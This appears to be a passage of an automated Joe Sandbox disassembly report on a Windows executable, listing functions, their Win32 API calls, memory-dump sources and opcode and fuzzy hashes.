                                                                                                                                  • Instruction ID: 8174b92409bfc3682f7f8d35aa9db6c78051813628ec27dbce567748f31ae8aa
                                                                                                                                  • Opcode Fuzzy Hash: be7dcf1dd903417497fb6e5c8e97097ede824c818c3e7bf00e357dde47caef1f
                                                                                                                                  • Instruction Fuzzy Hash: EA41CD71A00205AFDB14EF54CCA5FADB7E5BF54315F048009FA06AF2D2EB75A841EB51
                                                                                                                                  Function 00EE6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00EE62D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoad
                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                  • Opcode ID: d439cfdc34002e8f5a35480df6aecb891a8305bb8a9ed1a29374ad13e10faebe
                                                                                                                                  • Instruction ID: 7cf02b034f20d585da3ff96da4613c9a23a305f958e24f26db2c4f3ef3ca7506
                                                                                                                                  • Opcode Fuzzy Hash: d439cfdc34002e8f5a35480df6aecb891a8305bb8a9ed1a29374ad13e10faebe
                                                                                                                                  • Instruction Fuzzy Hash: 84110D3120838ABAD7015B55DC52EAA77DC9F2B3A4B10102DF701B6293F7A1AE415569
                                                                                                                                  Function 00EE757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00EE7595
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00EE759C
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EE75B2
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00EE75B9
                                                                                                                                  • _wprintf.LIBCMT ref: 00EE75DF
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE75FD
                                                                                                                                  Strings
                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00EE75DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                  • Opcode ID: 96692fb9e135b0f2a715b62b0385001ddcdd8bf93e9229452e8512749cc0e5ed
                                                                                                                                  • Instruction ID: ec13c4873524dff12fad597a8e8697db362f17648ceccc54d0c8a4cc36c80ceb
                                                                                                                                  • Opcode Fuzzy Hash: 96692fb9e135b0f2a715b62b0385001ddcdd8bf93e9229452e8512749cc0e5ed
                                                                                                                                  • Instruction Fuzzy Hash: B50131F290020CBFE721A7E4ED89EEB776CDB08305F0004A6B746E6041EA749E859B75
                                                                                                                                  Function 00F02A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F02AE7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479070676-0
                                                                                                                                  • Opcode ID: 59ca774f971f29e42ea074ed4d09bccd88f3efd89c1709c5f99f308c29bfb0dc
                                                                                                                                  • Instruction ID: 4518dad8db7581fd68868c3e48f4d515976aa3ed5674c45e8c2d7c8be81389ce
                                                                                                                                  • Opcode Fuzzy Hash: 59ca774f971f29e42ea074ed4d09bccd88f3efd89c1709c5f99f308c29bfb0dc
                                                                                                                                  • Instruction Fuzzy Hash: EE9199716042019FDB10EF54C899B6EB7E5FF88320F14880DF996AB2A1DB34E945EB52
                                                                                                                                  Function 00EF9AC3 Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1718709218-0
                                                                                                                                  • Opcode ID: 3d4178beaf9b826f5e6344cb0f764ec7a1bd71129fc0b93a8d1e6aae8ff7cf49
                                                                                                                                  • Instruction ID: 5fc37322165c62479d0d4b7d4abc79887ff81cb506fae3e3c64a4d916ae0bdef
                                                                                                                                  • Opcode Fuzzy Hash: 3d4178beaf9b826f5e6344cb0f764ec7a1bd71129fc0b93a8d1e6aae8ff7cf49
                                                                                                                                  • Instruction Fuzzy Hash: 1D71AF71508204AFC714EF64CC45F6BB7E8EF89714F20551DF695AB292DB30E905CB92
                                                                                                                                  Function 00ECB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __mtinitlocknum.LIBCMT ref: 00ECB744
                                                                                                                                    • Part of subcall function 00EC8A0C: __FF_MSGBANNER.LIBCMT ref: 00EC8A21
                                                                                                                                    • Part of subcall function 00EC8A0C: __NMSG_WRITE.LIBCMT ref: 00EC8A28
                                                                                                                                    • Part of subcall function 00EC8A0C: __malloc_crt.LIBCMT ref: 00EC8A48
                                                                                                                                  • __lock.LIBCMT ref: 00ECB757
                                                                                                                                  • __lock.LIBCMT ref: 00ECB7A3
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F56948,00000018,00ED6C2B,?,00000000,00000109), ref: 00ECB7BF
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00ECB7DC
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00ECB7EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1422805418-0
                                                                                                                                  • Opcode ID: 21e48b47baacaecf36fa4688315b1a9230fa2f5ef4b9c80d76fd3f359b9bd54c
                                                                                                                                  • Instruction ID: 5d4880b9d24873dbb1e32e29bf5ab525825676374b8b78efb64800e738a7bd6e
                                                                                                                                  • Opcode Fuzzy Hash: 21e48b47baacaecf36fa4688315b1a9230fa2f5ef4b9c80d76fd3f359b9bd54c
                                                                                                                                  • Instruction Fuzzy Hash: 6D413B72D002198BEB14DF68DA46B9DB7A4BF40339F20531DE825BB2D1CB769803CB90
                                                                                                                                  Function 00EEA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EEA1CE
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EEA205
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00EEA221
                                                                                                                                  • _memmove.LIBCMT ref: 00EEA26F
                                                                                                                                  • _memmove.LIBCMT ref: 00EEA28C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00EEA29B
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EEA2B0
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EEA2CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                  • Opcode ID: 2490543351ba6512d8fe5fd5ace408c460882e10bc3632d621098a573085d9b1
                                                                                                                                  • Instruction ID: ff74a6584c2519001b35e4ffd07e1770c7736597a7a39d47a7dee0a142bcb09f
                                                                                                                                  • Opcode Fuzzy Hash: 2490543351ba6512d8fe5fd5ace408c460882e10bc3632d621098a573085d9b1
                                                                                                                                  • Instruction Fuzzy Hash: BB31A131900209EBCB10DF95DC85EAEB7B8EF48310B1480A9F904BB256D771DE15DBA1
                                                                                                                                  Function 00F08CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F08CF3
                                                                                                                                  • GetDC.USER32(00000000), ref: 00F08CFB
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F08D06
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00F08D12
                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F08D4E
                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F08D5F
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F0BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00F08D99
                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F08DB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                  • Opcode ID: 4e02a02f9a47e18d4efb7b7a6ae631b4c84c2e1bf7f6c78900680acff214f823
                                                                                                                                  • Instruction ID: a81ee47428065bea780629ca3efd5bb670fd2b72eb81103104283e84ea574265
                                                                                                                                  • Opcode Fuzzy Hash: 4e02a02f9a47e18d4efb7b7a6ae631b4c84c2e1bf7f6c78900680acff214f823
                                                                                                                                  • Instruction Fuzzy Hash: C9317C72201214BFEB208F50CC8AFEA3FA9EF49765F044155FE48DA1D1CA759842EBB0
                                                                                                                                  Function 00EBB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df38972dca1e17ce789744884668cc04cf32d1d05369907a7be397d89a0d9936
                                                                                                                                  • Instruction ID: 8f04befb5d02daca2ced9f6cdb546e0f2192a3eab0602fffc2203f96dcbc3897
                                                                                                                                  • Opcode Fuzzy Hash: df38972dca1e17ce789744884668cc04cf32d1d05369907a7be397d89a0d9936
                                                                                                                                  • Instruction Fuzzy Hash: 6F716B71900109EFCB15CF98CC88AFFBB79FF85314F248159F965AA251D7709A42DB60
                                                                                                                                  Function 00F02121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F0214B
                                                                                                                                  • _memset.LIBCMT ref: 00F02214
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F02259
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EA3BCF: _wcscpy.LIBCMT ref: 00EA3BF2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F02320
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00F0232F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                                  • Opcode ID: 023a147e50194a8d01190f48a0d0f1bff3f604854d472ab67c2734805d2bfc7a
                                                                                                                                  • Instruction ID: 3463316525ad81f646bed95c82890fce6e4705e60009d6402cbd63b63c798520
                                                                                                                                  • Opcode Fuzzy Hash: 023a147e50194a8d01190f48a0d0f1bff3f604854d472ab67c2734805d2bfc7a
                                                                                                                                  • Instruction Fuzzy Hash: B7716B71A00619DFCF15EFA4C985A9EBBF5FF49310B108059E855BB391DB30AE41DBA0
                                                                                                                                  Function 00EE47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(?), ref: 00EE481D
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE4832
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00EE4893
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EE48C1
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EE48E0
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EE4926
                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EE4949
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: 648b61cdc8e0d07e1e53d920d95ec1bff8cb2a3c7e382f237ed4943ce23f2e83
                                                                                                                                  • Instruction ID: dbb2c46308ab69e43351de58e40f28bb7761632d3d88a5787430029ccf69c70d
                                                                                                                                  • Opcode Fuzzy Hash: 648b61cdc8e0d07e1e53d920d95ec1bff8cb2a3c7e382f237ed4943ce23f2e83
                                                                                                                                  • Instruction Fuzzy Hash: 9051F5E09087DA3DFB3A46368C45BBBBEA95B46308F089589F1D5768C3C2D9EC84D750
                                                                                                                                  Function 00EE45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(00000000), ref: 00EE4638
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE464D
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00EE46AE
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EE46DA
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EE46F7
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EE473B
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EE475C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: 27ac593cba8be59abb7fba743674509c1920fb8695bc28fede20dbbbc721cb67
                                                                                                                                  • Instruction ID: 5b2457386bf60efc474923566eea3a2ec91ce401354e9a097f635b8e1e9e29ff
                                                                                                                                  • Opcode Fuzzy Hash: 27ac593cba8be59abb7fba743674509c1920fb8695bc28fede20dbbbc721cb67
                                                                                                                                  • Instruction Fuzzy Hash: B951D4E05047DA3DFB3687668C45BB6BFE96B07308F085489E1D5668C2D3E4EC98E790
                                                                                                                                  Function 00EE86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2945705084-0
